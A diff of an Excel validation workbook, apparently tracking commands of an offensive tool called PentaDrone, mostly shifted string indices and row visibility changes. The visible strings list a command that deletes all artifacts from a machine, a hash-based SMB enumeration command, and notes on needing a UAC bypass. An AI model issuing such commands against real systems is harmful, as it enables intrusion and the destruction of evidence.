-        <v>188</v>
+        <v>185</v>
       </c>
       <c r="E31" t="s">
-        <v>137</v>
+        <v>134</v>
       </c>
     </row>
     <row r="32" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
@@ -3060,13 +3078,13 @@
         <v>71</v>
       </c>
       <c r="C32" s="1" t="s">
-        <v>104</v>
+        <v>101</v>
       </c>
       <c r="D32" s="6" t="s">
         <v>57</v>
       </c>
       <c r="E32" t="s">
-        <v>136</v>
+        <v>133</v>
       </c>
     </row>
     <row r="33" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3077,10 +3095,10 @@
         <v>66</v>
       </c>
       <c r="C33" s="1" t="s">
-        <v>187</v>
+        <v>184</v>
       </c>
       <c r="E33" t="s">
-        <v>135</v>
+        <v>132</v>
       </c>
     </row>
     <row r="34" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3091,7 +3109,7 @@
         <v>67</v>
       </c>
       <c r="C34" s="1" t="s">
-        <v>186</v>
+        <v>183</v>
       </c>
       <c r="E34" t="s">
         <v>21</v>
@@ -3105,10 +3123,13 @@
         <v>62</v>
       </c>
       <c r="C35" s="1" t="s">
-        <v>185</v>
+        <v>182</v>
+      </c>
+      <c r="D35" s="6" t="s">
+        <v>139</v>
       </c>
       <c r="E35" t="s">
-        <v>134</v>
+        <v>131</v>
       </c>
     </row>
     <row r="36" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3119,7 +3140,7 @@
         <v>74</v>
       </c>
       <c r="C36" s="1" t="s">
-        <v>184</v>
+        <v>181</v>
       </c>
       <c r="E36" t="s">
         <v>10</v>
@@ -3133,7 +3154,7 @@
         <v>68</v>
       </c>
       <c r="C37" s="1" t="s">
-        <v>183</v>
+        <v>180</v>
       </c>
       <c r="D37" s="6" t="s">
         <v>58</v>
@@ -3150,7 +3171,7 @@
         <v>68</v>
       </c>
       <c r="C38" s="1" t="s">
-        <v>182</v>
+        <v>179</v>
       </c>
       <c r="D38" s="6" t="s">
         <v>58</v>
@@ -3159,7 +3180,7 @@
         <v>25</v>
       </c>
     </row>
-    <row r="39" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+    <row r="39" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A39">
         <v>38</v>
       </c>
@@ -3167,16 +3188,16 @@
         <v>65</v>
       </c>
       <c r="C39" s="1" t="s">
-        <v>221</v>
+        <v>218</v>
       </c>
       <c r="D39" s="6" t="s">
         <v>57</v>
       </c>
       <c r="E39" t="s">
-        <v>253</v>
-      </c>
-    </row>
-    <row r="40" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>249</v>
+      </c>
+    </row>
+    <row r="40" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A40">
         <v>39</v>
       </c>
@@ -3184,10 +3205,10 @@
         <v>65</v>
       </c>
       <c r="C40" s="1" t="s">
-        <v>181</v>
+        <v>178</v>
       </c>
       <c r="E40" t="s">
-        <v>254</v>
+        <v>250</v>
       </c>
     </row>
     <row r="41" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3198,10 +3219,10 @@
         <v>70</v>
       </c>
       <c r="C41" s="1" t="s">
-        <v>138</v>
+        <v>135</v>
       </c>
       <c r="E41" t="s">
-        <v>139</v>
+        <v>136</v>
       </c>
     </row>
     <row r="42" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3212,7 +3233,7 @@
         <v>70</v>
       </c>
       <c r="C42" s="1" t="s">
-        <v>180</v>
+        <v>177</v>
       </c>
       <c r="D42" s="6" t="s">
         <v>57</v>
@@ -3229,7 +3250,7 @@
         <v>70</v>
       </c>
       <c r="C43" s="1" t="s">
-        <v>179</v>
+        <v>176</v>
       </c>
       <c r="D43" s="6" t="s">
         <v>56</v>
@@ -3246,13 +3267,13 @@
         <v>64</v>
       </c>
       <c r="C44" s="1" t="s">
-        <v>178</v>
+        <v>175</v>
       </c>
       <c r="D44" s="6" t="s">
         <v>58</v>
       </c>
       <c r="E44" t="s">
-        <v>228</v>
+        <v>225</v>
       </c>
     </row>
     <row r="45" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3263,7 +3284,7 @@
         <v>68</v>
       </c>
       <c r="C45" s="1" t="s">
-        <v>177</v>
+        <v>174</v>
       </c>
       <c r="E45" t="s">
         <v>12</v>
@@ -3277,13 +3298,13 @@
         <v>64</v>
       </c>
       <c r="C46" s="1" t="s">
-        <v>176</v>
+        <v>173</v>
       </c>
       <c r="D46" s="6" t="s">
         <v>58</v>
       </c>
       <c r="E46" t="s">
-        <v>96</v>
+        <v>93</v>
       </c>
     </row>
     <row r="47" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3294,7 +3315,7 @@
         <v>64</v>
       </c>
       <c r="C47" s="1" t="s">
-        <v>175</v>
+        <v>172</v>
       </c>
       <c r="E47" t="s">
         <v>34</v>
@@ -3308,7 +3329,7 @@
         <v>64</v>
       </c>
       <c r="C48" s="1" t="s">
-        <v>174</v>
+        <v>171</v>
       </c>
       <c r="D48" s="6" t="s">
         <v>57</v>
@@ -3325,7 +3346,7 @@
         <v>63</v>
       </c>
       <c r="C49" s="1" t="s">
-        <v>173</v>
+        <v>170</v>
       </c>
       <c r="D49" s="6" t="s">
         <v>58</v>
@@ -3342,13 +3363,13 @@
         <v>63</v>
       </c>
       <c r="C50" s="1" t="s">
-        <v>172</v>
+        <v>169</v>
       </c>
       <c r="D50" s="6" t="s">
         <v>56</v>
       </c>
       <c r="E50" t="s">
-        <v>245</v>
+        <v>242</v>
       </c>
     </row>
     <row r="51" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
@@ -3359,7 +3380,7 @@
         <v>68</v>
       </c>
       <c r="C51" s="1" t="s">
-        <v>171</v>
+        <v>168</v>
       </c>
       <c r="D51" s="6" t="s">
         <v>58</v>
@@ -3376,7 +3397,7 @@
         <v>63</v>
       </c>
       <c r="C52" s="1" t="s">
-        <v>170</v>
+        <v>167</v>
       </c>
       <c r="E52" t="s">
         <v>15</v>
@@ -3390,7 +3411,7 @@
         <v>67</v>
       </c>
       <c r="C53" s="1" t="s">
-        <v>169</v>
+        <v>166</v>
       </c>
       <c r="D53" s="6" t="s">
         <v>56</v>
@@ -3407,7 +3428,7 @@
         <v>67</v>
       </c>
       <c r="C54" s="1" t="s">
-        <v>168</v>
+        <v>165</v>
       </c>
       <c r="D54" s="6" t="s">
         <v>56</v>
@@ -3424,10 +3445,10 @@
         <v>67</v>
       </c>
       <c r="C55" s="1" t="s">
-        <v>167</v>
+        <v>164</v>
       </c>
       <c r="D55" s="6" t="s">
-        <v>56</v>
+        <v>139</v>
       </c>
       <c r="E55" t="s">
         <v>28</v>
@@ -3444,7 +3465,7 @@
         <v>67</v>
       </c>
       <c r="C56" s="1" t="s">
-        <v>166</v>
+        <v>163</v>
       </c>
       <c r="D56" s="6" t="s">
         <v>56</v>
@@ -3461,10 +3482,10 @@
         <v>67</v>
       </c>
       <c r="C57" s="1" t="s">
-        <v>165</v>
+        <v>162</v>
       </c>
       <c r="D57" s="6" t="s">
-        <v>56</v>
+        <v>139</v>
       </c>
       <c r="E57" t="s">
         <v>30</v>
@@ -3478,7 +3499,7 @@
         <v>67</v>
       </c>
       <c r="C58" s="1" t="s">
-        <v>164</v>
+        <v>161</v>
       </c>
       <c r="D58" s="6" t="s">
         <v>56</v>
@@ -3495,7 +3516,7 @@
         <v>71</v>
       </c>
       <c r="C59" s="1" t="s">
-        <v>163</v>
+        <v>160</v>
       </c>
       <c r="D59" s="6" t="s">
         <v>56</v>
@@ -3512,7 +3533,7 @@
         <v>68</v>
       </c>
       <c r="C60" s="1" t="s">
-        <v>158</v>
+        <v>155</v>
       </c>
       <c r="D60" s="6" t="s">
         <v>56</v>
@@ -3529,10 +3550,10 @@
         <v>62</v>
       </c>
       <c r="C61" s="1" t="s">
-        <v>159</v>
+        <v>156</v>
       </c>
       <c r="D61" s="6" t="s">
-        <v>142</v>
+        <v>139</v>
       </c>
     </row>
     <row r="62" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
@@ -3543,7 +3564,7 @@
         <v>63</v>
       </c>
       <c r="C62" s="1" t="s">
-        <v>160</v>
+        <v>157</v>
       </c>
       <c r="D62" s="6" t="s">
         <v>57</v>
@@ -3560,13 +3581,13 @@
         <v>68</v>
       </c>
       <c r="C63" s="1" t="s">
-        <v>161</v>
+        <v>158</v>
       </c>
       <c r="D63" s="6" t="s">
         <v>56</v>
       </c>
       <c r="E63" t="s">
-        <v>258</v>
+        <v>254</v>
       </c>
     </row>
     <row r="64" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
@@ -3577,7 +3598,7 @@
         <v>63</v>
       </c>
       <c r="C64" s="1" t="s">
-        <v>162</v>
+        <v>159</v>
       </c>
       <c r="E64" t="s">
         <v>59</v>
@@ -3591,10 +3612,10 @@
         <v>66</v>
       </c>
       <c r="C65" s="1" t="s">
-        <v>150</v>
+        <v>147</v>
       </c>
       <c r="E65" t="s">
-        <v>91</v>
+        <v>264</v>
       </c>
     </row>
     <row r="66" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3605,10 +3626,10 @@
         <v>66</v>
       </c>
       <c r="C66" t="s">
-        <v>151</v>
+        <v>148</v>
       </c>
       <c r="E66" t="s">
-        <v>92</v>
+        <v>263</v>
       </c>
     </row>
     <row r="67" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3619,10 +3640,10 @@
         <v>70</v>
       </c>
       <c r="C67" s="1" t="s">
-        <v>140</v>
+        <v>137</v>
       </c>
       <c r="E67" t="s">
-        <v>141</v>
+        <v>138</v>
       </c>
     </row>
     <row r="68" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3633,13 +3654,13 @@
         <v>62</v>
       </c>
       <c r="C68" s="1" t="s">
-        <v>152</v>
+        <v>149</v>
       </c>
       <c r="E68" t="s">
-        <v>220</v>
-      </c>
-    </row>
-    <row r="69" spans="1:5" x14ac:dyDescent="0.25">
+        <v>217</v>
+      </c>
+    </row>
+    <row r="69" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A69">
         <v>68</v>
       </c>
@@ -3647,7 +3668,7 @@
         <v>75</v>
       </c>
       <c r="C69" s="1" t="s">
-        <v>153</v>
+        <v>150</v>
       </c>
       <c r="E69" t="s">
         <v>80</v>
@@ -3684,7 +3705,7 @@
         <v>58</v>
       </c>
       <c r="E71" t="s">
-        <v>250</v>
+        <v>246</v>
       </c>
     </row>
     <row r="72" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3698,7 +3719,7 @@
         <v>84</v>
       </c>
       <c r="E72" t="s">
-        <v>257</v>
+        <v>253</v>
       </c>
     </row>
     <row r="73" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3746,7 +3767,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="76" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+    <row r="76" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A76">
         <v>75</v>
       </c>
@@ -3754,13 +3775,13 @@
         <v>65</v>
       </c>
       <c r="C76" s="1" t="s">
-        <v>93</v>
+        <v>267</v>
       </c>
       <c r="E76" t="s">
-        <v>246</v>
-      </c>
-    </row>
-    <row r="77" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>268</v>
+      </c>
+    </row>
+    <row r="77" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A77">
         <v>76</v>
       </c>
@@ -3768,13 +3789,16 @@
         <v>65</v>
       </c>
       <c r="C77" s="1" t="s">
-        <v>94</v>
+        <v>91</v>
+      </c>
+      <c r="D77" s="6" t="s">
+        <v>139</v>
       </c>
       <c r="E77" t="s">
-        <v>247</v>
-      </c>
-    </row>
-    <row r="78" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>243</v>
+      </c>
+    </row>
+    <row r="78" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A78">
         <v>77</v>
       </c>
@@ -3782,16 +3806,16 @@
         <v>65</v>
       </c>
       <c r="C78" s="1" t="s">
-        <v>95</v>
+        <v>92</v>
       </c>
       <c r="D78" s="6" t="s">
-        <v>56</v>
+        <v>58</v>
       </c>
       <c r="E78" t="s">
-        <v>101</v>
-      </c>
-    </row>
-    <row r="79" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>98</v>
+      </c>
+    </row>
+    <row r="79" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A79">
         <v>78</v>
       </c>
@@ -3799,13 +3823,13 @@
         <v>65</v>
       </c>
       <c r="C79" s="1" t="s">
-        <v>98</v>
+        <v>95</v>
       </c>
       <c r="D79" s="6" t="s">
-        <v>142</v>
+        <v>139</v>
       </c>
       <c r="E79" t="s">
-        <v>97</v>
+        <v>94</v>
       </c>
     </row>
     <row r="80" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3816,10 +3840,10 @@
         <v>71</v>
       </c>
       <c r="C80" s="1" t="s">
-        <v>100</v>
+        <v>97</v>
       </c>
       <c r="E80" t="s">
-        <v>99</v>
+        <v>96</v>
       </c>
     </row>
     <row r="81" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3830,13 +3854,13 @@
         <v>73</v>
       </c>
       <c r="C81" s="1" t="s">
-        <v>129</v>
+        <v>126</v>
       </c>
       <c r="E81" t="s">
-        <v>240</v>
-      </c>
-    </row>
-    <row r="82" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>237</v>
+      </c>
+    </row>
+    <row r="82" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A82">
         <v>81</v>
       </c>
@@ -3844,16 +3868,16 @@
         <v>65</v>
       </c>
       <c r="C82" s="1" t="s">
-        <v>130</v>
+        <v>127</v>
       </c>
       <c r="D82" s="6" t="s">
         <v>58</v>
       </c>
       <c r="E82" t="s">
-        <v>249</v>
-      </c>
-    </row>
-    <row r="83" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>245</v>
+      </c>
+    </row>
+    <row r="83" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A83">
         <v>82</v>
       </c>
@@ -3861,13 +3885,13 @@
         <v>65</v>
       </c>
       <c r="C83" s="1" t="s">
-        <v>131</v>
+        <v>128</v>
       </c>
       <c r="D83" s="6" t="s">
         <v>58</v>
       </c>
       <c r="E83" t="s">
-        <v>248</v>
+        <v>244</v>
       </c>
     </row>
     <row r="84" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3878,10 +3902,10 @@
         <v>69</v>
       </c>
       <c r="C84" s="1" t="s">
-        <v>132</v>
-      </c>
-    </row>
-    <row r="85" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>129</v>
+      </c>
+    </row>
+    <row r="85" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A85">
         <v>84</v>
       </c>
@@ -3889,13 +3913,13 @@
         <v>65</v>
       </c>
       <c r="C85" s="1" t="s">
-        <v>133</v>
+        <v>130</v>
       </c>
       <c r="E85" t="s">
-        <v>224</v>
-      </c>
-    </row>
-    <row r="86" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>221</v>
+      </c>
+    </row>
+    <row r="86" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A86">
         <v>85</v>
       </c>
@@ -3903,13 +3927,13 @@
         <v>65</v>
       </c>
       <c r="C86" s="1" t="s">
-        <v>144</v>
+        <v>141</v>
       </c>
       <c r="D86" s="6" t="s">
         <v>58</v>
       </c>
       <c r="E86" t="s">
-        <v>225</v>
+        <v>222</v>
       </c>
     </row>
     <row r="87" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3920,10 +3944,10 @@
         <v>70</v>
       </c>
       <c r="C87" s="1" t="s">
-        <v>145</v>
+        <v>142</v>
       </c>
       <c r="E87" t="s">
-        <v>145</v>
+        <v>142</v>
       </c>
     </row>
     <row r="88" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3934,10 +3958,10 @@
         <v>68</v>
       </c>
       <c r="C88" s="1" t="s">
-        <v>154</v>
+        <v>151</v>
       </c>
       <c r="E88" t="s">
-        <v>147</v>
+        <v>144</v>
       </c>
     </row>
     <row r="89" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3948,10 +3972,10 @@
         <v>73</v>
       </c>
       <c r="C89" s="1" t="s">
-        <v>155</v>
+        <v>152</v>
       </c>
       <c r="E89" t="s">
-        <v>148</v>
+        <v>145</v>
       </c>
     </row>
     <row r="90" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3962,10 +3986,10 @@
         <v>73</v>
       </c>
       <c r="C90" t="s">
-        <v>156</v>
+        <v>153</v>
       </c>
       <c r="E90" t="s">
-        <v>215</v>
+        <v>212</v>
       </c>
     </row>
     <row r="91" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3976,10 +4000,10 @@
         <v>73</v>
       </c>
       <c r="C91" t="s">
-        <v>157</v>
+        <v>154</v>
       </c>
       <c r="E91" t="s">
-        <v>149</v>
+        <v>146</v>
       </c>
     </row>
     <row r="92" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3990,10 +4014,10 @@
         <v>63</v>
       </c>
       <c r="C92" s="1" t="s">
+        <v>213</v>
+      </c>
+      <c r="E92" t="s">
         <v>216</v>
-      </c>
-      <c r="E92" t="s">
-        <v>219</v>
       </c>
     </row>
     <row r="93" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -4004,10 +4028,10 @@
         <v>68</v>
       </c>
       <c r="C93" s="1" t="s">
-        <v>217</v>
+        <v>214</v>
       </c>
       <c r="E93" t="s">
-        <v>256</v>
+        <v>252</v>
       </c>
     </row>
     <row r="94" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -4018,10 +4042,10 @@
         <v>70</v>
       </c>
       <c r="C94" s="1" t="s">
+        <v>226</v>
+      </c>
+      <c r="E94" t="s">
         <v>229</v>
-      </c>
-      <c r="E94" t="s">
-        <v>232</v>
       </c>
     </row>
     <row r="95" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -4032,10 +4056,10 @@
         <v>64</v>
       </c>
       <c r="C95" s="1" t="s">
-        <v>231</v>
+        <v>228</v>
       </c>
       <c r="E95" t="s">
-        <v>230</v>
+        <v>227</v>
       </c>
     </row>
     <row r="96" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -4046,10 +4070,10 @@
         <v>66</v>
       </c>
       <c r="C96" s="1" t="s">
-        <v>234</v>
+        <v>231</v>
       </c>
       <c r="E96" t="s">
-        <v>233</v>
+        <v>230</v>
       </c>
     </row>
     <row r="97" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -4060,10 +4084,10 @@
         <v>63</v>
       </c>
       <c r="C97" s="1" t="s">
-        <v>236</v>
+        <v>233</v>
       </c>
       <c r="E97" t="s">
-        <v>237</v>
+        <v>234</v>
       </c>
     </row>
     <row r="98" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -4074,13 +4098,13 @@
         <v>66</v>
       </c>
       <c r="C98" s="1" t="s">
-        <v>238</v>
+        <v>235</v>
       </c>
       <c r="E98" t="s">
-        <v>235</v>
-      </c>
-    </row>
-    <row r="99" spans="1:5" x14ac:dyDescent="0.25">
+        <v>232</v>
+      </c>
+    </row>
+    <row r="99" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A99">
         <v>98</v>
       </c>
@@ -4088,10 +4112,10 @@
         <v>75</v>
       </c>
       <c r="C99" s="1" t="s">
-        <v>160</v>
+        <v>157</v>
       </c>
       <c r="E99" t="s">
-        <v>239</v>
+        <v>236</v>
       </c>
     </row>
     <row r="100" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -4102,16 +4126,16 @@
         <v>64</v>
       </c>
       <c r="C100" s="1" t="s">
-        <v>241</v>
+        <v>238</v>
       </c>
       <c r="D100" s="6" t="s">
         <v>58</v>
       </c>
       <c r="E100" t="s">
-        <v>242</v>
-      </c>
-    </row>
-    <row r="101" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>239</v>
+      </c>
+    </row>
+    <row r="101" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A101">
         <v>100</v>
       </c>
@@ -4119,28 +4143,48 @@
         <v>65</v>
       </c>
       <c r="C101" s="1" t="s">
-        <v>251</v>
+        <v>247</v>
+      </c>
+      <c r="D101" s="6" t="s">
+        <v>58</v>
       </c>
       <c r="E101" t="s">
-        <v>252</v>
-      </c>
-    </row>
-    <row r="102" spans="1:5" x14ac:dyDescent="0.25">
+        <v>248</v>
+      </c>
+    </row>
+    <row r="102" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+      <c r="A102">
+        <v>101</v>
+      </c>
       <c r="B102" t="s">
         <v>75</v>
       </c>
       <c r="C102" s="1" t="s">
-        <v>264</v>
+        <v>260</v>
       </c>
       <c r="E102" t="s">
-        <v>263</v>
+        <v>259</v>
+      </c>
+    </row>
+    <row r="103" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+      <c r="A103">
+        <v>102</v>
+      </c>
+      <c r="B103" t="s">
+        <v>73</v>
+      </c>
+      <c r="C103" s="1" t="s">
+        <v>261</v>
+      </c>
+      <c r="E103" t="s">
+        <v>262</v>
       </c>
     </row>
   </sheetData>
-  <autoFilter ref="A1:E101" xr:uid="{873B811C-17E0-44D6-BE49-771EF1C74A88}">
+  <autoFilter ref="A1:E103" xr:uid="{873B811C-17E0-44D6-BE49-771EF1C74A88}">
     <filterColumn colId="1">
       <filters>
-        <filter val="Privilege Escalation"/>
+        <filter val="Discovery"/>
       </filters>
     </filterColumn>
     <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:E79">
@@ -4477,31 +4521,31 @@
     </row>
     <row r="2" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A2" t="s">
-        <v>105</v>
+        <v>102</v>
       </c>
       <c r="B2" s="6" t="s">
-        <v>120</v>
+        <v>117</v>
       </c>
     </row>
     <row r="3" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A3" t="s">
-        <v>106</v>
+        <v>103</v>
       </c>
       <c r="B3" s="6" t="s">
-        <v>121</v>
+        <v>118</v>
       </c>
     </row>
     <row r="4" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A4" t="s">
-        <v>122</v>
+        <v>119</v>
       </c>
       <c r="B4" s="6" t="s">
-        <v>121</v>
+        <v>118</v>
       </c>
     </row>
     <row r="5" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A5" t="s">
-        <v>107</v>
+        <v>104</v>
       </c>
       <c r="B5" s="6" t="s">
         <v>58</v>
@@ -4515,7 +4559,7 @@
     </row>
     <row r="6" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A6" t="s">
-        <v>108</v>
+        <v>105</v>
       </c>
       <c r="B6" s="6" t="s">
         <v>58</v>
@@ -4535,19 +4579,19 @@
     </row>
     <row r="7" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A7" t="s">
-        <v>109</v>
+        <v>106</v>
       </c>
       <c r="B7" s="6" t="s">
         <v>58</v>
       </c>
       <c r="C7" t="s">
-        <v>123</v>
+        <v>120</v>
       </c>
       <c r="N7" t="s">
         <v>75</v>
       </c>
       <c r="P7" t="s">
-        <v>121</v>
+        <v>118</v>
       </c>
       <c r="R7" t="s">
         <v>40</v>
@@ -4555,7 +4599,7 @@
     </row>
     <row r="8" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A8" t="s">
-        <v>110</v>
+        <v>107</v>
       </c>
       <c r="B8" s="6" t="s">
         <v>58</v>
@@ -4564,7 +4608,7 @@
         <v>63</v>
       </c>
       <c r="P8" t="s">
-        <v>120</v>
+        <v>117</v>
       </c>
       <c r="R8" t="s">
         <v>41</v>
@@ -4572,10 +4616,10 @@
     </row>
     <row r="9" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A9" t="s">
-        <v>111</v>
+        <v>108</v>
       </c>
       <c r="B9" s="6" t="s">
-        <v>120</v>
+        <v>117</v>
       </c>
       <c r="N9" t="s">
         <v>64</v>
@@ -4586,7 +4630,7 @@
     </row>
     <row r="10" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A10" t="s">
-        <v>112</v>
+        <v>109</v>
       </c>
       <c r="B10" s="6" t="s">
         <v>58</v>
@@ -4603,10 +4647,10 @@
     </row>
     <row r="11" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A11" t="s">
-        <v>113</v>
+        <v>110</v>
       </c>
       <c r="B11" s="6" t="s">
-        <v>121</v>
+        <v>118</v>
       </c>
       <c r="N11" t="s">
         <v>66</v>
@@ -4617,13 +4661,13 @@
     </row>
     <row r="12" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A12" t="s">
-        <v>114</v>
+        <v>111</v>
       </c>
       <c r="B12" s="6" t="s">
-        <v>120</v>
+        <v>117</v>
       </c>
       <c r="C12" t="s">
-        <v>124</v>
+        <v>121</v>
       </c>
       <c r="N12" t="s">
         <v>67</v>
@@ -4634,13 +4678,13 @@
     </row>
     <row r="13" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A13" t="s">
-        <v>115</v>
+        <v>112</v>
       </c>
       <c r="B13" s="6" t="s">
-        <v>121</v>
+        <v>118</v>
       </c>
       <c r="C13" t="s">
-        <v>125</v>
+        <v>122</v>
       </c>
       <c r="N13" t="s">
         <v>68</v>
@@ -4651,13 +4695,13 @@
     </row>
     <row r="14" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A14" t="s">
-        <v>116</v>
+        <v>113</v>
       </c>
       <c r="B14" s="6" t="s">
-        <v>121</v>
+        <v>118</v>
       </c>
       <c r="C14" t="s">
-        <v>127</v>
+        <v>124</v>
       </c>
       <c r="N14" t="s">
         <v>69</v>
@@ -4668,13 +4712,13 @@
     </row>
     <row r="15" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A15" t="s">
+        <v>114</v>
+      </c>
+      <c r="B15" s="6" t="s">
         <v>117</v>
       </c>
-      <c r="B15" s="6" t="s">
-        <v>120</v>
-      </c>
       <c r="C15" t="s">
-        <v>126</v>
+        <v>123</v>
       </c>
       <c r="N15" t="s">
         <v>70</v>
@@ -4685,10 +4729,10 @@
     </row>
     <row r="16" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A16" t="s">
-        <v>118</v>
+        <v>115</v>
       </c>
       <c r="B16" s="6" t="s">
-        <v>120</v>
+        <v>117</v>
       </c>
       <c r="N16" t="s">
         <v>71</v>
@@ -4699,13 +4743,13 @@
     </row>
     <row r="17" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A17" t="s">
-        <v>119</v>
+        <v>116</v>
       </c>
       <c r="B17" s="6" t="s">
-        <v>121</v>
+        <v>118</v>
       </c>
       <c r="C17" t="s">
-        <v>128</v>
+        <v>125</v>
       </c>
       <c r="N17" t="s">
         <v>72</v>
@@ -4716,7 +4760,7 @@
     </row>
     <row r="18" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A18" t="s">
-        <v>143</v>
+        <v>140</v>
       </c>
       <c r="B18" s="6" t="s">
         <v>58</v>

--- a/validate-cmd.xlsx
+++ b/validate-cmd.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="E:\sharelab\pnt\PentaDrone\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{A1934A3C-68BB-4441-8D4C-76A23FF739D4}" xr6:coauthVersionLast="41" xr6:coauthVersionMax="43" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{BC39291C-AD3F-4EC2-AD51-B0AE16929234}" xr6:coauthVersionLast="41" xr6:coauthVersionMax="43" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="10155" yWindow="195" windowWidth="17700" windowHeight="12720" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
+    <workbookView xWindow="11685" yWindow="3390" windowWidth="17700" windowHeight="12720" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="Cmde state validation" sheetId="1" r:id="rId1"/>
@@ -358,7 +358,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="482" uniqueCount="269">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="483" uniqueCount="269">
   <si>
     <t xml:space="preserve">  #  !quit   -     Delete all artifacts and clean computer. The end of operations</t>
   </si>
@@ -1233,13 +1233,13 @@
     <t>work only with ps greater than 3</t>
   </si>
   <si>
-    <t>Need to bypass UAC to be efficient</t>
-  </si>
-  <si>
     <t>!smbenum</t>
   </si>
   <si>
     <t>#!!smbenum|toto|F8580EAGFH89725  -Enumarate Group,Sessions,Users,shares, need HASH</t>
+  </si>
+  <si>
+    <t>but need bypassUAC to be efficient</t>
   </si>
 </sst>
 </file>
@@ -1352,7 +1352,7 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="9">
+  <cellXfs count="11">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" wrapText="1"/>
